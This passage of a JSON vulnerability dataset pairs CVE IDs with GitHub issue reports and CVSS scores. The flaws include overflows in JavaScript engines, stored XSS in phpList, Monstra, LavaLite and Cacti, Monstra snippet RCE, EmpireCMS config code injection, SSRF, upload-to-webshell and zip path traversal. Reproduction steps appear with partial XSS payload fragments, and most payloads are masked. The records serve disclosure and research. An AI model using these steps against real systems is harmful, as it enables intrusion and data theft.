async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG SUMMARY: APITAG stack overflow NUMBERTAG malloc NUMBERTAG ABORTING",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-22882",
        "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/351",
        "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/351",
        "Repo_new": "moddable-opensource/moddable",
        "Issue_Created_At": "2020-04-17T16:01:51Z",
        "description": "Type confusion vulnerability. Enviroment CODETAG poc ERRORTAG vulnerability description: The stack traceback is shown in the figure: FILETAG When processing js code, first APITAG will be called to generate a node tree, And when met: FILETAG It can cause errors in object references, which can cause type confusion. The specific vulnerability trigger point is on line APITAG NUMBERTAG as shown in the figure FILETAG The current item is considered a temporary function type that has been declared, but in fact it is an undefined array type in poc. APITAG construction FILETAG Simply assign a value to an undefined array.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-22884",
        "Issue_Url_old": "https://github.com/espruino/Espruino/issues/1799",
        "Issue_Url_new": "https://github.com/espruino/espruino/issues/1799",
        "Repo_new": "espruino/espruino",
        "Issue_Created_At": "2020-04-15T16:09:44Z",
        "description": "buffer overflow. Enviroment APITAG poc: ERRORTAG vulnerability description: The poc will cause the memory corruption of the parser. Below is the output of ASAN\uff1a ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-22885",
        "Issue_Url_old": "https://github.com/ccxvii/mujs/issues/133",
        "Issue_Url_new": "https://github.com/ccxvii/mujs/issues/133",
        "Repo_new": "ccxvii/mujs",
        "Issue_Created_At": "2020-04-17T06:37:43Z",
        "description": "stack overflow. Enviroment APITAG poc: ERRORTAG vulnerability description: Poc will cause stack overflow. As shown below: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-22886",
        "Issue_Url_old": "https://github.com/ccxvii/mujs/issues/134",
        "Issue_Url_new": "https://github.com/ccxvii/mujs/issues/134",
        "Repo_new": "ccxvii/mujs",
        "Issue_Created_At": "2020-04-17T14:17:17Z",
        "description": "stack overflow. Enviroment APITAG poc ERRORTAG vulnerability description: Poc will cause stack overflow. As shown below: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-22907",
        "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/16",
        "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/16",
        "Repo_new": "pcmacdon/jsish",
        "Issue_Created_At": "2020-05-20T14:49:25Z",
        "description": "heap overflow. Enviroment APITAG poc: ERRORTAG vulnerability description Below is the ASAN output, We can find that the code has a heap overflow in jsi_evalcode_sub APITAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-22937",
        "Issue_Url_old": "https://github.com/leadscloud/EmpireCMS/issues/4",
        "Issue_Url_new": "https://github.com/leadscloud/empirecms/issues/4",
        "Repo_new": "leadscloud/empirecms",
        "Issue_Created_At": "2020-04-21T12:03:46Z",
        "description": "Code Injection APITAG Brief of this vulnerability APITAG , when installing cms you can write PHP code to config file and execute arbitrary PHP code. Test Environment Windows NUMBERTAG PHP APITAG Affect version APITAG NUMBERTAG ulnerable Code APITAG CODETAG Table prefix of database with APITAG APITAG APITAG APITAG ERRORTAG function APITAG will parse APITAG to APITAG and then update the config file by call APITAG ERRORTAG APITAG will parse mydbtbpre into APITAG then write APITAG into APITAG Vulnerability display When install cms, set APITAG FILETAG Trigger vulnerability FILETAG Vulnerability description && Fix suggestion The attacker can write malicious PHP code to the config file through install file and execute to obtain webshell. Add PHP character filter in install file. And restrict file execution permissions and directories.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-23015",
        "Issue_Url_old": "https://github.com/opnsense/core/issues/4061",
        "Issue_Url_new": "https://github.com/opnsense/core/issues/4061",
        "Repo_new": "opnsense/core",
        "Issue_Created_At": "2020-04-24T17:37:52Z",
        "description": "URL open redirect leads to phishing attacks. Important notices Before you add a new report, we ask you kindly to acknowledge the following: [ ] I have read the contributing guide lines at FILETAG [ ] I have searched the existing issues and I'm convinced that mine is new. Describe the bug Redirect URL in login page was not filtered and can redirect user to any website. Attackers can send a URL like APITAG to firewall user. If user enter the credential and login, he will be redirected to malicious page To Reproduce Steps to reproduce the behavior NUMBERTAG Access APITAG NUMBERTAG Enter the credential NUMBERTAG User was redirected to APITAG Environment APITAG NUMBERTAG amd NUMBERTAG APITAG NUMBERTAG RELEASE p NUMBERTAG HBSD APITAG NUMBERTAG d NUMBERTAG Sep NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-23079",
        "Issue_Url_old": "https://github.com/halo-dev/halo/issues/806",
        "Issue_Url_new": "https://github.com/halo-dev/halo/issues/806",
        "Repo_new": "halo-dev/halo",
        "Issue_Created_At": "2020-04-29T08:03:08Z",
        "description": "SSRF vulnerability exists at the SMTP configuration, which can detect the server intranet. APITAG the password of the login account of the system background is transmitted in plain text, it can easily enter the background through brute force cracking\uff1a APITAG problem lies in the STMP server configuration\uff0cwhich can specify host address and port FILETAG APITAG is a hidden APITAG () interface in the code to test the connectivity of the mailbox server FILETAG NUMBERTAG It is a APITAG that depends on springframework\uff1a FILETAG NUMBERTAG So you can test through this interface, write the address as APITAG the server port is open, the corresponding time is shorter NUMBERTAG millis\uff1a FILETAG APITAG port is not open, the corresponding time is longer NUMBERTAG millis\uff1a FILETAG APITAG can obtain the open ports of the server and other hosts on the intranet in batches according to the length of the echo time, and then carry out further attacks",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-23083",
        "Issue_Url_old": "https://github.com/zhangdaiscott/jeecg/issues/56",
        "Issue_Url_new": "https://github.com/zhangdaiscott/jeecg/issues/56",
        "Repo_new": "zhangdaiscott/jeecg",
        "Issue_Created_At": "2020-04-30T02:52:25Z",
        "description": "jeecg NUMBERTAG file upload vulnerability. In landing APITAG the APITAG the allowed file suffix first URLTAG FILETAG The system only does the front end check to the upload file\uff0cwe can use burp to grab bag\uff0cchange the suffix of file name to APITAG you can upload it successfully FILETAG The uploaded address is as follows\uff0cwe can use the upload vulnerability to get a webshell FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-23109",
        "Issue_Url_old": "https://github.com/strukturag/libheif/issues/207",
        "Issue_Url_new": "https://github.com/strukturag/libheif/issues/207",
        "Repo_new": "strukturag/libheif",
        "Issue_Created_At": "2020-02-24T02:04:49Z",
        "description": "Heap overflow in APITAG I spotted this overflow in APITAG . how to reproduce: APITAG FILETAG Here is the report of ASAN ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-23171",
        "Issue_Url_old": "https://github.com/nim-lang/zip/issues/54",
        "Issue_Url_new": "https://github.com/nim-lang/zip/issues/54",
        "Repo_new": "nim-lang/zip",
        "Issue_Created_At": "2020-05-10T02:44:06Z",
        "description": "Directory traversal vulnerability from libzip. Issue Given a crafted zip file containing a file of filename APITAG , zip will extract the file to APITAG , while actually it should be extracted to APITAG . This vulnerability could allow the attacker to write a file to an arbitrary directory. How to reproduce You can try to reproduce this vulnerability using FILETAG , you can find the APITAG here URLTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-23172",
        "Issue_Url_old": "https://github.com/kuba--/zip/issues/123",
        "Issue_Url_new": "https://github.com/kuba--/zip/issues/123",
        "Repo_new": "kuba--/zip",
        "Issue_Created_At": "2020-05-09T15:30:27Z",
        "description": "Directory traversal vulnerability when handling crafted zip file. On the latest version NUMBERTAG and the master branch of zip: there is a vulnerability that can be triggered by a crafted zip file, specifically, a file with filename such as APITAG will be extracted as APITAG , while the correct way is APITAG . To reproduce the issue, you may try to extract this FILETAG , which contains two files APITAG and APITAG . Here is the APITAG repo] ( URLTAG This root cause is that zip doesn't normalize the path in APITAG in APITAG . I will try to send a pull request to fix it later.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-23190",
        "Issue_Url_old": "https://github.com/phpList/phplist3/issues/667",
        "Issue_Url_new": "https://github.com/phplist/phplist3/issues/667",
        "Repo_new": "phplist/phplist3",
        "Issue_Created_At": "2020-05-26T04:03:24Z",
        "description": "Cross Site Scripting Vulnerability on APITAG Mail\" feature in Lavelite. Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG Mail\" feature. To Reproduce Steps to reproduce the behavior NUMBERTAG Log into the panel NUMBERTAG Go to PATHTAG NUMBERTAG Click \"import by uploading a file with emails NUMBERTAG Insert payload: APITAG APITAG load=alert('XSS')// APITAG NUMBERTAG Click APITAG NUMBERTAG iew the preview to trigger XSS NUMBERTAG iew the preview to get in request and such Stored XSS Expected behavior The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is stored back to the page. Impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. Screenshots FILETAG FILETAG FILETAG Desktop (please complete the following information): OS: Windows Browser: Firefox Version NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-23192",
        "Issue_Url_old": "https://github.com/phpList/phplist3/issues/671",
        "Issue_Url_new": "https://github.com/phplist/phplist3/issues/671",
        "Repo_new": "phplist/phplist3",
        "Issue_Created_At": "2020-05-29T16:45:03Z",
        "description": "Cross Site Scripting Vulnerability on APITAG administrators\" feature in APITAG NUMBERTAG Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG administrators\" feature. To Reproduce Steps to reproduce the behavior NUMBERTAG Log into the panel NUMBERTAG Go to PATHTAG NUMBERTAG Click APITAG administrators NUMBERTAG Click \"admin\" edit infomation admin NUMBERTAG Insert payload: \"> APITAG FILETAG // \"> APITAG NUMBERTAG Click APITAG Changes NUMBERTAG iew the preview to trigger XSS NUMBERTAG iew the preview to get in request and such Stored XSS Expected behavior The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is stored back to the page. Impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. Screenshots FILETAG Insert payload FILETAG Click APITAG Changes\" > Click APITAG of administrator\" > View Stored XSS FILETAG Desktop (please complete the following information): OS: Windows Browser: Firefox Version NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-23194",
        "Issue_Url_old": "https://github.com/phpList/phplist3/issues/678",
        "Issue_Url_new": "https://github.com/phplist/phplist3/issues/678",
        "Repo_new": "phplist/phplist3",
        "Issue_Created_At": "2020-06-07T14:34:39Z",
        "description": "Cross Site Scripting Vulnerability on APITAG subscribers\" feature in APITAG NUMBERTAG upload file SVG.. Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG subscribers\" feature. To Reproduce Steps to reproduce the behavior NUMBERTAG Log into the panel NUMBERTAG Go to PATHTAG NUMBERTAG Click APITAG NUMBERTAG Import payload file SVG: FILETAG NUMBERTAG Click button APITAG NUMBERTAG Click select APITAG NUMBERTAG Click button \"CONTINUE NUMBERTAG iew the preview to trigger XSS NUMBERTAG iew the preview to get in request and such Stored XSS. Expected behavior The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is stored back to the page. Impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. Screenshots FILETAG FILETAG FILETAG Trigger XSS FILETAG Desktop (please complete the following information): OS: Ubuntu Browser: Firefox Version NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-23205",
        "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/465",
        "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/465",
        "Repo_new": "monstra-cms/monstra",
        "Issue_Created_At": "2020-05-22T18:18:39Z",
        "description": "Cross Site Script Vulnerability on APITAG Settings\" in Monstra version NUMBERTAG Hii, Team Monstra!!! Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG Settings\" feature Monstra. To Reproduce Steps to reproduce the behavior: APITAG into the panel Monstra NUMBERTAG Go to APITAG NUMBERTAG Click APITAG > APITAG NUMBERTAG Insert Payload XSS: \"> APITAG '> APITAG // \"> APITAG APITAG APITAG load=alert NUMBERTAG APITAG NUMBERTAG Save NUMBERTAG click View Site > xss alert message! Impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. Screenshots a. Infor Monstra version: FILETAG b. insert payload xss: FILETAG c. view site > xss alert message FILETAG Desktop (please complete the following information): OS: Windows Browser: All Version: I Hope you fix it ASAP!!!!",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-23207",
        "Issue_Url_old": "https://github.com/phpList/phplist3/issues/664",
        "Issue_Url_new": "https://github.com/phplist/phplist3/issues/664",
        "Repo_new": "phplist/phplist3",
        "Issue_Created_At": "2020-05-25T04:25:57Z",
        "description": "Cross Site Script Vulnerability on APITAG Attributes\" feature in phplist version NUMBERTAG Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the \"configure attributes\" feature. To Reproduce Steps to reproduce the behavior NUMBERTAG Login into the panel phplist NUMBERTAG Go to PATHTAG NUMBERTAG Click APITAG Values' > APITAG new NUMBERTAG Insert Payload XSS: '> APITAG NUMBERTAG Add new Woonplaats NUMBERTAG ss alert message Expected behavior The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page Screenhost NUMBERTAG login FILETAG NUMBERTAG Add new FILETAG NUMBERTAG Insert payload xss FILETAG NUMBERTAG ss alert message FILETAG Desktop (please complete the following information): OS: Windows Browser: All Version I Hope you fix it ASAP",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-23208",
        "Issue_Url_old": "https://github.com/phpList/phplist3/issues/665",
        "Issue_Url_new": "https://github.com/phplist/phplist3/issues/665",
        "Repo_new": "phplist/phplist3",
        "Issue_Created_At": "2020-05-25T04:59:40Z",
        "description": "Cross Site Script Vulnerability on APITAG a Campaign\" feature in phplist version NUMBERTAG Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG a Campaign\" feature. To Reproduce Steps to reproduce the behavior NUMBERTAG Login into the panel phplist NUMBERTAG Go to PATHTAG NUMBERTAG Click APITAG or continue a campaign' > 'no title NUMBERTAG Insert Payload XSS: 'to email address(es)' // \"> APITAG FILETAG NUMBERTAG Next NUMBERTAG ss alert message Expected behavior The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page Screnhost FILETAG FILETAG FILETAG Impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. Desktop (please complete the following information): OS: Windows Browser: All Version I Hope you fix it ASAP",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-23209",
        "Issue_Url_old": "https://github.com/phpList/phplist3/issues/666",
        "Issue_Url_new": "https://github.com/phplist/phplist3/issues/666",
        "Repo_new": "phplist/phplist3",
        "Issue_Created_At": "2020-05-25T18:43:58Z",
        "description": "Cross Site Script Vulnerability on APITAG Lists\" feature in phplist version NUMBERTAG Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG Lists\" feature. To Reproduce Steps to reproduce the behavior NUMBERTAG Login into the panel phplist NUMBERTAG Go to PATHTAG NUMBERTAG Click APITAG Lists' > APITAG a lists NUMBERTAG Insert Payload XSS: 'to email address(es)' '> APITAG NUMBERTAG Save > Click APITAG > APITAG some subscribers NUMBERTAG ss alert message Expected behavior The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page Screnhost FILETAG FILETAG FILETAG FILETAG FILETAG Also Video APITAG URLTAG Impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. Desktop (please complete the following information): OS: Windows Browser: All Version I Hope you fix it ASAP!!!",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-23214",
        "Issue_Url_old": "https://github.com/phpList/phplist3/issues/669",
        "Issue_Url_new": "https://github.com/phplist/phplist3/issues/669",
        "Repo_new": "phplist/phplist3",
        "Issue_Created_At": "2020-05-27T16:15:59Z",
        "description": "Cross Site Script Vulnerability on APITAG Lists\" feature in phplist version NUMBERTAG Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG Lists\" feature. To Reproduce Steps to reproduce the behavior NUMBERTAG Login into the panel phplist NUMBERTAG Go to PATHTAG NUMBERTAG Click APITAG Lists' > APITAG Lists' > APITAG Categories NUMBERTAG Insert Payload XSS: '> APITAG NUMBERTAG Save and Back > click chose 'CATEGORY' new > Save > click Subscribers NUMBERTAG ss alert message Screenhost FILETAG FILETAG FILETAG FILETAG FILETAG Also Video APITAG URLTAG Expected behavior The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page Impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. Desktop (please complete the following information): OS: Windows Browser: All Version I Hope you fix it ASAP!!!",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-23217",
        "Issue_Url_old": "https://github.com/phpList/phplist3/issues/672",
        "Issue_Url_new": "https://github.com/phplist/phplist3/issues/672",
        "Repo_new": "phplist/phplist3",
        "Issue_Created_At": "2020-05-30T11:15:26Z",
        "description": "Bypass Cross Site Scripting Vulnerability on \"IMPORT EMAILS\" feature in php list NUMBERTAG Hi Team phplist3, I found a small bug! Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the \"IMPORT EMAILS\" feature. It affects both options SEND A CAMPAIGN feature. To Reproduce Steps to reproduce the behavior NUMBERTAG Login into the panel phplist NUMBERTAG Go to PATHTAG NUMBERTAG Chose APITAG > Click APITAG some subscribers' > Chose NUMBERTAG options APITAG and paste list of emails) > APITAG a list NUMBERTAG Insert Payload XSS: APITAG X APITAG FILETAG NUMBERTAG Save NUMBERTAG ss alert message Screenhost FILETAG FILETAG FILETAG FILETAG Also Video APITAG URLTAG Expected behavior The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page Impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. Desktop (please complete the following information): OS: Windows Browser: All Version I Hope you fix it ASAP!!!",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-23219",
        "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/466",
        "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/466",
        "Repo_new": "monstra-cms/monstra",
        "Issue_Created_At": "2020-05-22T19:16:40Z",
        "description": "Remote Code Execution via Snippets module in Monstra version NUMBERTAG Describe the bug An attacker could insert any executable code through php via Snippets Module to execution command in the server To Reproduce NUMBERTAG Log into the panel NUMBERTAG Go to APITAG NUMBERTAG Click edit NUMBERTAG Insert payload APITAG NUMBERTAG output); ?> APITAG APITAG NUMBERTAG Save and Exit NUMBERTAG Go to index view Screenhost FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-23226",
        "Issue_Url_old": "https://github.com/Cacti/cacti/issues/3549",
        "Issue_Url_new": "https://github.com/cacti/cacti/issues/3549",
        "Repo_new": "cacti/cacti",
        "Issue_Created_At": "2020-05-10T18:12:32Z",
        "description": "Several XSS Vulnerabilities. Describe the bug Several XSS Vulnerabilities during XSS testing To Reproduce Case NUMBERTAG Go to APITAG NUMBERTAG APITAG a report NUMBERTAG Add a APITAG item with Fixed Text APITAG NUMBERTAG Click save, and then return to Item list NUMBERTAG See error, popup APITAG as below FILETAG NUMBERTAG Click APITAG tab NUMBERTAG See error again. Case NUMBERTAG Go to APITAG > Data Collection > Data Queries NUMBERTAG Select a data query, and click name to edit it NUMBERTAG Click name of one of Associated Graph Templates NUMBERTAG Modify name to APITAG NUMBERTAG Click Save button, then click Return button NUMBERTAG Click x icon of row right for the modified one NUMBERTAG See error, popup APITAG as below FILETAG Case3 FILETAG , delete,click a output/input field with APITAG alert('test CVE'); APITAG Case4 FILETAG add graph items with a color named APITAG alert('test CVE'); APITAG Case5 FILETAG add tree with APITAG alert('test CVE'); APITAG Case6 aggregate graph place on a tree named with APITAG alert('test CVE'); APITAG Desktop (please complete the following information) OS: Windows NUMBERTAG Browser: Firefox Version NUMBERTAG ESR",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-23234",
        "Issue_Url_old": "https://github.com/LavaLite/cms/issues/320",
        "Issue_Url_new": "https://github.com/lavalite/cms/issues/320",
        "Repo_new": "lavalite/cms",
        "Issue_Created_At": "2020-05-21T02:42:23Z",
        "description": "Cross Site Scripting Vulnerability on APITAG Links\" feature in APITAG NUMBERTAG Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG Blocks\" feature. This was can be bypassed by using HTML event handlers, such as \"ontoggle\". To Reproduce Steps to reproduce the behavior NUMBERTAG Log into the /admin NUMBERTAG Go to PATHTAG NUMBERTAG Click APITAG NUMBERTAG Select a function then press New NUMBERTAG Insert payload to Name: '> APITAG FILETAG NUMBERTAG Click APITAG NUMBERTAG iew the preview to trigger XSS NUMBERTAG iew the preview to get in request and such Stored XSS FILETAG Impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
